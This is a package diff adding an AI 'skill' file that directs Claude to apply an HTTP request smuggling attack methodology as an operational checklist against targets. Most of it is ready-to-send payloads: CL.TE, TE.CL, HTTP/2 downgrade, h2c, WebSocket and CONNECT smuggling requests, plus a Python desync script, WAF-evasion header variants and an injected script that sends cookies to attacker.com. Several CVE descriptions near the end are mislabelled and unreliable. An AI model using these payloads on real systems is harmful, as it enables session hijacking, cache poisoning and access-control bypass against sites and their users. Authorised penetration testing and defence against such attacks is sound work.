@aegis-scan/skills 0.1.1

package/skills/offensive/snailsploit-fork/request-smuggling/SKILL.md

@@ -0,0 +1,773 @@
+<!-- aegis-local: forked 2026-04-23 from SnailSploit/Claude-Red@c74d53e2938b59f111572e0819265a1e73029393; attribution preserved, see ATTRIBUTION.md -->
+
+# SKILL: HTTP Request Smuggling
+
+## Metadata
+- **Skill Name**: request-smuggling
+- **Folder**: offensive-request-smuggling
+- **Source**: https://github.com/SnailSploit/offensive-checklist/blob/main/req-smuggle.md
+
+## Description
+HTTP request smuggling checklist: CL.TE, TE.CL, TE.TE variants, detection with timing and differential responses, WAF bypass, cache poisoning, credential hijacking, and request smuggling via HTTP/2. Use when testing reverse proxy/load balancer configurations.
+
+## Trigger Phrases
+Use this skill when the conversation involves any of:
+`request smuggling, HTTP smuggling, CL.TE, TE.CL, TE.TE, HTTP/2 smuggling, cache poisoning, WAF bypass, differential response, smuggling detection, proxy desync`
+
+## Instructions for Claude
+
+When this skill is active:
+1. Load and apply the full methodology below as your operational checklist
+2. Follow steps in order unless the user specifies otherwise
+3. For each technique, consider applicability to the current target/context
+4. Track which checklist items have been completed
+5. Suggest next steps based on findings
+
+---
+
+## Full Methodology
+
+# HTTP Request Smuggling
+
+## Mechanisms
+
+HTTP Request Smuggling is a vulnerability that occurs when front-end and back-end servers interpret HTTP requests differently, leading to a desynchronization in the HTTP request processing chain. This desynchronization allows attackers to "smuggle" requests to the back-end server, potentially bypassing security controls or manipulating how other users' requests are processed.
+
+```mermaid
+graph TD
+    A[Client] -->|HTTP Request| B[Front-end Server]
+    B -->|Interpreted Request| C[Back-end Server]
+    B -->|Different Interpretation| D[Desynchronization]
+    D -->|Smuggled Request| C
+    D -->|Security Bypass| E[Unauthorized Access]
+    D -->|Queue Poisoning| F[Response Hijacking]
+```
+
+Request smuggling vulnerabilities arise from inconsistencies in how servers parse and interpret HTTP messages, particularly regarding:
+
+- **Transfer-Encoding (TE) header**: Indicates chunked encoding
+- **Content-Length (CL) header**: Specifies the length of the message body
+- **Header parsing**: Different handling of whitespace, newlines, and malformed headers
+
+Common desynchronization scenarios include:
+
+- **CL.TE**: Front-end uses Content-Length, back-end uses Transfer-Encoding
+- **TE.CL**: Front-end uses Transfer-Encoding, back-end uses Content-Length
+- **TE.TE**: Both servers use Transfer-Encoding but handle edge cases differently
+
+HTTP/2/3 specific desync variants:
+
+- H2.CL / H2.TE: Conflicts between HTTP/2 body length signaling and HTTP/1 backends during downgrade.
+- H2C Upgrade: Cleartext HTTP/2 (h2c) upgrade paths mishandled by intermediaries.
+- Authority/Host Confusion: `:authority` vs `Host` normalization inconsistencies under CDNs.
+
+```mermaid
+graph LR
+    subgraph "CL.TE Attack"
+        A1[Client] -->|"POST / HTTP/1.1<br>Content-Length: 30<br>Transfer-Encoding: chunked<br><br>0<br><br>GET /admin HTTP/1.1<br>X-Ignore:"| B1[Front-end]
+        B1 -->|"Uses Content-Length: 30<br>Sees one complete request"| C1[Back-end]
+        C1 -->|"Uses Transfer-Encoding<br>Sees two requests:<br>1. POST /<br>2. GET /admin"| D1[Smuggled Request Processed]
+    end
+```
+
+Modern variations include:
+
+- **H2.HTTP/1**: HTTP/2 to HTTP/1 downgrades causing inconsistencies
+- **HTTP/1.H2**: HTTP/1 to HTTP/2 transitions with different interpretations
+- **Timeout-based**: Exploiting time differences in connection handling
+- **Method-based**: Different interpretations of HTTP methods
+- **Header-based**: Inconsistent header parsing between servers
+
+## Hunt
+
+### Identifying Vulnerable Applications
+
+#### Architecture Reconnaissance
+
+- Look for multi-server architectures with proxies, load balancers, or CDNs
+- Identify systems using Nginx, HAProxy, Varnish, or Amazon ALB/CloudFront
+- Check for HTTP/2 support with HTTP/1 backend compatibility
+
+#### Basic Detection Tests
+
+1. CL.TE Vulnerability Detection (Time Delay Example):
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Transfer-Encoding: chunked
+   Content-Length: 4
+
+   1
+   A
+   X
+   ```
+
+   Send this request, then send a normal request. If the normal request experiences a time delay, CL.TE might be present.
+
+2. TE.CL Vulnerability Detection (Time Delay Example):
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Transfer-Encoding: chunked
+   Content-Length: 6
+
+   0
+
+   X
+   ```
+
+   Send this request, then send a normal request. If the normal request experiences a time delay, TE.CL might be present.
+
+3. CL.TE Confirmation (Example):
+
+   ```http
+   POST / HTTP/1.1
+   Host: your-lab-id.web-security-academy.net
+   Connection: keep-alive
+   Content-Type: application/x-www-form-urlencoded
+   Content-Length: 6
+   Transfer-Encoding: chunked
+
+   0
+
+   G
+   ```
+
+   Send twice. The second response should indicate an unrecognized method like `GPOST`.
+
+4. TE.CL Confirmation (Example):
+   (Ensure Burp's "Update Content-Length" is unchecked)
+
+   ```http
+   POST / HTTP/1.1
+   Host: your-lab-id.web-security-academy.net
+   Content-Type: application/x-www-form-urlencoded
+   Content-length: 4
+   Transfer-Encoding: chunked
+
+   5c
+   GPOST / HTTP/1.1
+   Content-Type: application/x-www-form-urlencoded
+   Content-Length: 15
+
+   x=1
+   0
+
+
+   ```
+
+   Send twice. The second request should show the effect of the smuggled `GPOST`.
+
+5. TE.TE Desync Detection (Obfuscation Example):
+   (Ensure Burp's "Update Content-Length" is unchecked)
+
+   ```http
+   POST / HTTP/1.1
+   Host: your-lab-id.web-security-academy.net
+   Content-Type: application/x-www-form-urlencoded
+   Content-length: 4
+   Transfer-Encoding: chunked
+   Transfer-encoding: cow
+
+   5c
+   GPOST / HTTP/1.1
+   Content-Type: application/x-www-form-urlencoded
+   Content-Length: 15
+
+   x=1
+   0
+
+
+   ```
+
+   Send twice. The second request should show the effect of the smuggled `GPOST`, confirming that one server ignored the obfuscated `Transfer-encoding: cow` header.
+
+#### Advanced Detection Techniques
+
+- **Differential Testing**: Observe response timing differences
+- **Time Delays**: Add artificial delays between requests to detect queue interference
+- **Obfuscation Testing**: Try various obfuscation techniques:
+  ```http
+  Transfer-Encoding: xchunked
+  Transfer-Encoding: chunked
+  Transfer-Encoding : chunked
+  Transfer-Encoding: chunked
+  Transfer-Encoding: identity, chunked
+  ```
+
+  - HTTP/2 Specific: Duplicate `content-length` headers, mixed/malformed pseudo-headers, abnormal stream resets, header/continuation frame splitting.
+
+### Testing Methodology
+
+```mermaid
+flowchart TD
+    A[Initial Assessment] --> B{Vulnerability Detected?}
+    B -->|Yes| C[Confirmation Testing]
+    B -->|No| D[Try Advanced Techniques]
+    D --> B
+    C --> E{Confirmed?}
+    E -->|Yes| F[Targeted Testing]
+    E -->|No| D
+    F --> G[Documentation & Exploitation]
+
+    subgraph "Initial Assessment"
+        A1[Test CL.TE Payloads]
+        A2[Test TE.CL Payloads]
+        A3[Check Header Obfuscation]
+    end
+
+    subgraph "Confirmation Testing"
+        C1[Send Request with Clear Response]
+        C2[Test Queue Poisoning]
+        C3[Check Status Code Anomalies]
+    end
+
+    subgraph "Targeted Testing"
+        F1[Test HTTP/2 Downgrade]
+        F2[Check Header Oversizing]
+        F3[Test Method Handling]
+    end
+```
+
+1. **Initial Assessment**:
+   - Test standard CL.TE and TE.CL payloads
+   - Try header obfuscation techniques
+   - Check for timing inconsistencies
+
+2. **Confirmation Testing**:
+   - Send a smuggled request that should trigger a distinct response
+   - Test for request queue poisoning by affecting subsequent requests
+   - Look for response status code anomalies
+
+3. **Targeted Testing**:
+   - Test HTTP/2 downgrade scenarios
+   - Check for header oversizing vulnerabilities
+   - Test method-specific handling differences
+
+## Vulnerabilities
+
+### Common HTTP Request Smuggling Scenarios
+
+```mermaid
+mindmap
+  root((HTTP Request Smuggling))
+    Security Control Bypass
+      WAF Bypass
+      Access Control Evasion
+      Authentication Bypass
+    Request/Response Queue Poisoning
+      Request Hijacking
+      Response Queue Poisoning
+      Cache Poisoning
+    Server-Specific Vulnerabilities
+      Nginx-Specific
+      Apache-Specific
+      NodeJS-Specific
+    Impact
+      Session Hijacking
+      Data Exposure
+      XSS Injection
+      Cache Poisoning
+      Network Scanning
+      Account Takeover
+```
+
+#### Security Control Bypass
+
+- Web Application Firewall (WAF) Bypass: Smuggling malicious content past WAF inspection
+- Access Control Evasion: Accessing restricted resources by smuggling authorized-looking requests
+- Authentication Bypass: Manipulating authentication flows through request smuggling
+
+#### Request/Response Queue Poisoning
+
+- Request Hijacking: Capturing parts of another user's request including cookies or authentication tokens
+- Response Queue Poisoning: Causing wrong responses to be sent to users
+- Cache Poisoning: Injecting malicious content into caches serving multiple users
+
+#### Server-Specific Vulnerabilities
+
+- Nginx-Specific: Inconsistent `Transfer-Encoding` handling with underscore prefixes
+- Apache-Specific: Different chunked encoding parser behavior
+- NodeJS-Specific: Unique header parsing behavior with multiple headers
+
+### Impact Examples
+
+- Session Hijacking: Stealing user session cookies through request smuggling
+- Sensitive Data Exposure: Smuggling requests to internal resources
+- Cross-Site Scripting (XSS): Injecting malicious scripts into responses sent to other users
+- HTTP Cache Poisoning: Poisoning cached responses viewed by multiple users
+- Internal Network Scanning: Using request smuggling for SSRF-like network scanning
+- Account Takeover: Smuggling requests to change user credentials
+
+## Methodologies
+
+### Tools
+
+- Burp Suite Professional: HTTP Request Smuggler extension ([_PortSwigger BApp Store_](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646))
+- smuggler.py: `python3 smuggler.py -u <URL>` ([_defparam/smuggler_](https://github.com/defparam/smuggler), [_anshumanpattnaik/http-request-smuggling_](https://github.com/anshumanpattnaik/http-request-smuggling))
+- tiscripts: Collection of scripts including smuggling checks ([_defparam/tiscripts_](https://github.com/defparam/tiscripts))
+- h2csmuggler: `go run ./cmd/h2csmuggler check https://target.com/ http://localhost` ([_assetnote/h2csmuggler_](https://github.com/assetnote/h2csmuggler), [_BishopFox/h2csmuggler_](https://github.com/BishopFox/h2csmuggler) for HTTP/2)
+- Turbo Intruder: For advanced/customized request smuggling techniques in Burp Suite.
+- Param Miner: For detecting hidden attack surfaces which might be vulnerable.
+- h2spec / h3spec: Conformance testing for HTTP/2 and HTTP/3 implementations.
+
+### Testing Techniques
+
+#### Basic Request Smuggling Test Patterns
+
+1. **CL.TE Pattern**:
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Content-Length: 39
+   Transfer-Encoding: chunked
+
+   0
+
+   GET /admin HTTP/1.1
+   Host: vulnerable-website.com
+   ```
+
+2. **TE.CL Pattern**:
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Content-Length: 4
+   Transfer-Encoding: chunked
+
+   5c
+   GPOST / HTTP/1.1
+   Content-Type: application/x-www-form-urlencoded
+   Content-Length: 15
+
+   x=1
+   0
+
+   ```
+
+3. **HTTP/2 Downgrade Pattern**:
+
+   ```http
+   :method: POST
+   :path: /
+   :authority: vulnerable-website.com
+   content-length: 0
+   content-length: 44
+
+   GET /admin HTTP/1.1
+   Host: vulnerable-website.com
+   ```
+
+4. **H2C Upgrade Smuggling Pattern**:
+
+```
+GET / HTTP/1.1
+Host: vulnerable-website.com
+Connection: Upgrade, HTTP2-Settings
+Upgrade: h2c
+HTTP2-Settings: AAMAAABkAAQAAP__
+
+GET /admin HTTP/1.1
+Host: vulnerable-website.com
+```
+
+#### Advanced Exploitation Techniques
+
+1. **Request Hijacking**:
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Content-Length: 50
+   Transfer-Encoding: chunked
+
+   0
+
+   GET / HTTP/1.1
+   Host: vulnerable-website.com
+   ```
+
+2. **Response Queue Poisoning**:
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Content-Length: 146
+   Transfer-Encoding: chunked
+
+   0
+
+   HTTP/1.1 200 OK
+   Content-Type: text/html
+   Content-Length: 30
+
+   <html>Fake Response</html>
+   ```
+
+3. **WebSocket Hijacking**:
+
+   ```http
+   POST / HTTP/1.1
+   Host: vulnerable-website.com
+   Content-Length: 65
+   Transfer-Encoding: chunked
+
+   0
+
+   GET /socket HTTP/1.1
+   Upgrade: websocket
+   Connection: Upgrade
+   ```
+
+### Defense Testing
+
+1. **Testing Patch Effectiveness**:
+   - Retest with various obfuscation techniques after patches
+   - Check for incomplete fixes or workarounds
+
+2. **Header Variations**:
+
+   ```
+   Transfer-Encoding: chunked
+   transfer-encoding: chunked
+   Transfer-Encoding:chunked
+   Transfer-Encoding: identity,chunked
+   Transfer-Encoding: identity, chunked
+   ```
+
+3. **Chunk Size Manipulation**:
+
+   ```
+   1\r\n
+   A\r\n
+   0\r\n
+   \r\n
+   ```
+
+4. **HTTP/2 Strictness Checks**:
+
+- Ensure single, consistent body length signaling; reject duplicate/malformed pseudo-headers.
+- Disable or tightly control h2c upgrades at edges.
+
+### Real-World Exploitation Workflow
+
+```mermaid
+sequenceDiagram
+    participant A as Attacker
+    participant F as Front-end Server
+    participant B as Back-end Server
+    participant V as Victim
+
+    A->>F: 1. Send Smuggling Payload
+    F->>B: 2. First Request (Front-end interpretation)
+    Note over F,B: Desynchronization Occurs
+    A->>F: 3. Send Normal Request
+    F->>B: 4. Second Request gets appended to smuggled content
+    V->>F: 5. Victim sends innocent request
+    F->>B: 6. Victim's request gets processed with attacker's content
+    B->>F: 7. Modified response based on smuggled content
+    F->>V: 8. Victim receives unexpected/malicious response
+```
+
+1. **Identify Desync Vulnerability**:
+   - Test CL.TE, TE.CL, TE.TE patterns
+   - Confirm with time-delay observations
+
+2. **Establish Attack Vector**:
+   - Determine the most reliable desync method
+   - Identify the best obfuscation technique for the target
+
+3. **Craft Exploitation Payload**:
+   - Create a request that smuggles another request
+   - Target sensitive functionality or information disclosure
+
+4. **Execute and Validate**:
+   - Send the smuggled request
+   - Observe the effects on subsequent responses
+
+5. **Document Impact**:
+   - Demonstrate real security implications
+   - Show how the vulnerability could affect users
+
+### Modern Desync Variants
+
+#### HTTP/3 Desync
+
+HTTP/3 uses QUIC transport which introduces new desync opportunities when proxies translate between HTTP/3 and HTTP/1.1:
+
+**HTTP/3 to HTTP/1.1 Translation:**
+
+```
+# HTTP/3 request with duplicate headers
+:method: POST
+:path: /api/endpoint
+:authority: target.com
+content-length: 10
+content-length: 50
+
+# Backend may use different content-length value
+```
+
+**Testing HTTP/3:**
+
+```bash
+# Using curl with HTTP/3
+curl --http3 https://target.com/endpoint -v
+
+# Check Alt-Svc header indicating HTTP/3 support
+curl -I https://target.com | grep -i alt-svc
+```
+
+**QUIC Stream Manipulation:**
+
+- Multiple streams in single connection may be processed inconsistently
+- Stream resets can leave partial data in backend queues
+- QPACK header compression differences between implementations
+
+#### Client-Side Desync (CSD)
+
+Client-side desync exploits browser behavior to poison the browser's own connection pool, affecting subsequent requests from the same client.
+
+**Mechanism:**
+
+1. Attacker crafts response that browser caches
+2. Response includes smuggled request
+3. Next victim request gets poisoned response
+
+**Example CSD Attack:**
+
+```http
+POST / HTTP/1.1
+Host: vulnerable.com
+Content-Length: 150
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+Host: vulnerable.com
+Content-Length: 10
+
+x=
+GET /static/innocent.js HTTP/1.1
+Host: vulnerable.com
+```
+
+**Browser receives:**
+
+```http
+HTTP/1.1 200 OK
+Content-Length: 100
+
+<script>
+  // Malicious JavaScript injected into cached response
+  document.location='http://attacker.com/steal?cookie='+document.cookie;
+</script>
+```
+
+**Testing for CSD:**
+
+1. Send smuggling payload
+2. Open same site in new tab
+3. Check if subsequent request receives smuggled response
+4. Look for `Age` or `X-Cache` headers indicating cache hit
+
+**High-Value Targets:**
+
+- JavaScript files (cached and executed)
+- CSS files (for exfiltration via background-image)
+- JSON API responses (manipulate application state)
+
+#### WebSocket Desync
+
+WebSocket upgrade process can be vulnerable to request smuggling:
+
+**WebSocket Upgrade Smuggling:**
+
+```http
+POST / HTTP/1.1
+Host: vulnerable.com
+Content-Length: 200
+Transfer-Encoding: chunked
+
+0
+
+GET /chat HTTP/1.1
+Host: vulnerable.com
+Upgrade: websocket
+Connection: Upgrade
+Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
+Sec-WebSocket-Version: 13
+Sec-WebSocket-Protocol: attacker-injection
+
+```
+
+**Smuggling After WebSocket Establishment:**
+
+```http
+# Send via established WebSocket connection
+GET /admin HTTP/1.1
+Host: vulnerable.com
+Cookie: admin_session=stolen_token
+```
+
+**WebSocket Frame Manipulation:**
+
+- Inject malicious frames during upgrade
+- Exploit frame fragmentation handling differences
+- Target WebSocket proxies (nginx, HAProxy) that may parse differently
+
+**Testing Steps:**
+
+1. Initiate WebSocket upgrade with smuggling payload
+2. Monitor if backend processes smuggled HTTP request
+3. Check WebSocket frames for injected content
+4. Test multiple simultaneous upgrade requests
+
+#### Request Tunneling via CONNECT
+
+CONNECT method can be abused for request smuggling:
+
+```http
+CONNECT internal.service:80 HTTP/1.1
+Host: vulnerable-proxy.com
+
+GET /admin HTTP/1.1
+Host: internal.service
+Authorization: Bearer stolen_token
+```
+
+**Testing:**
+
+1. Send CONNECT request to proxy
+2. Include smuggled request in CONNECT body
+3. Check if proxy forwards to internal service
+
+#### Pause-Based Desync
+
+Exploiting TCP flow control and timing:
+
+```python
+import socket
+import time
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect(('vulnerable.com', 80))
+
+# Send headers slowly
+s.send(b'POST / HTTP/1.1\r\n')
+time.sleep(2)
+s.send(b'Host: vulnerable.com\r\n')
+time.sleep(2)
+s.send(b'Content-Length: 50\r\n')
+s.send(b'Transfer-Encoding: chunked\r\n\r\n')
+
+# Send smuggled request
+s.send(b'0\r\n\r\nGET /admin HTTP/1.1\r\n')
+s.send(b'Host: vulnerable.com\r\n\r\n')
+```
+
+#### Header Oversizing
+
+Exploit differences in maximum header sizes:
+
+```http
+POST / HTTP/1.1
+Host: vulnerable.com
+X-Padding: AAAA[... 8KB of data ...]
+Content-Length: 100
+Transfer-Encoding: chunked
+
+0
+
+GET /admin HTTP/1.1
+```
+
+If front-end accepts larger headers than backend, backend may miss headers after cutoff point.
+
+### Detection Bypass Techniques (Advanced)
+
+**Header Name Obfuscation:**
+
+```http
+Transfer-Encoding : chunked          # Space before colon
+Transfer-Encoding\t: chunked         # Tab
+Transfer\rEncoding: chunked          # Carriage return
+Transfer\x00Encoding: chunked        # Null byte (rare)
+Transfer\x0bEncoding: chunked        # Vertical tab
+```
+
+**Multiple Content-Length Variations:**
+
+```http
+Content-Length: 10
+Content-Length: 20
+Content-length: 30           # Case variation
+CONTENT-LENGTH: 40           # Uppercase
+Content-Length : 50          # Space before colon
+```
+
+**HTTP/2 Pseudo-Header Smuggling:**
+
+```http
+:method: POST
+:path: /
+:authority: target.com
+:method: GET                  # Duplicate pseudo-header
+content-length: 0
+content-length: 50            # Duplicate content-length
+```
+
+**Transfer-Encoding Value Pollution:**
+
+```http
+Transfer-Encoding: chunked, identity
+Transfer-Encoding: identity, chunked
+Transfer-Encoding: chunked;q=1
+Transfer-Encoding: chunked\x20\x20
+Transfer-Encoding: chunked\x0d\x0a
+```
+
+### Real-World CVEs
+
+1. **CVE-2023-45853 - MiniZinc HTTP Parser**:
+   - Request smuggling via Transfer-Encoding handling
+   - Impact: RCE via smuggled requests
+
+2. **CVE-2023-38545 - curl SOCKS5 Heap Overflow**:
+   - Related to connection reuse that could enable smuggling
+   - Impact: RCE in certain configurations
+
+3. **CVE-2022-31629 - PHP HTTP Response Splitting**:
+   - Response splitting enabling smuggling attacks
+   - Impact: XSS and cache poisoning
+
+4. **CVE-2021-41773 - Apache HTTP Server Path Traversal**:
+   - Could be chained with request smuggling
+   - Impact: RCE via CGI script access
+
+5. **CVE-2020-11724 - Varnish Cache HTTP/2 Desync**:
+   - HTTP/2 to HTTP/1.1 downgrade desync
+   - Impact: Cache poisoning and request smuggling
+
+## Remediation Recommendations
+
+- **Consistent Request Parsing**: Ensure consistent parsing rules across all servers
+- **HTTP/2 Isolation**: Avoid translating between HTTP/2 and HTTP/1.1 where possible
+- **Header Validation**: Implement strict header validation
+- **Connection Resets**: Reset connections after each request when possible
+- **WAF Rules**: Configure WAF to detect request smuggling attempts
+- **Content-Length Validation**: Ensure Content-Length matches actual content
+- **Chunked Encoding Validation**: Implement proper chunked encoding parsing
+- **Regular Security Testing**: Perform request smuggling-specific security tests
+- **Unified Parser**: Use a single RFC-compliant parsing library across front/back tiers; normalize `Host`/`:authority`
+- **Gateway Hardening**: Strip hop-by-hop/duplicate headers; disable TE other than `chunked`; enforce single message framing signal
+- **HTTP/3 Controls**: Ensure QUIC implementation correctly handles stream management and header compression
+- **WebSocket Security**: Validate WebSocket upgrade requests; sanitize Sec-WebSocket-\* headers; limit concurrent upgrades
+- **Client-Side Desync Prevention**: Set `Connection: close` on sensitive responses; use HTTP/2 exclusively; implement strict cache controls
+- **Monitoring**: Log anomalous header patterns; alert on multiple Content-Length or Transfer-Encoding headers; track connection reuse metrics
+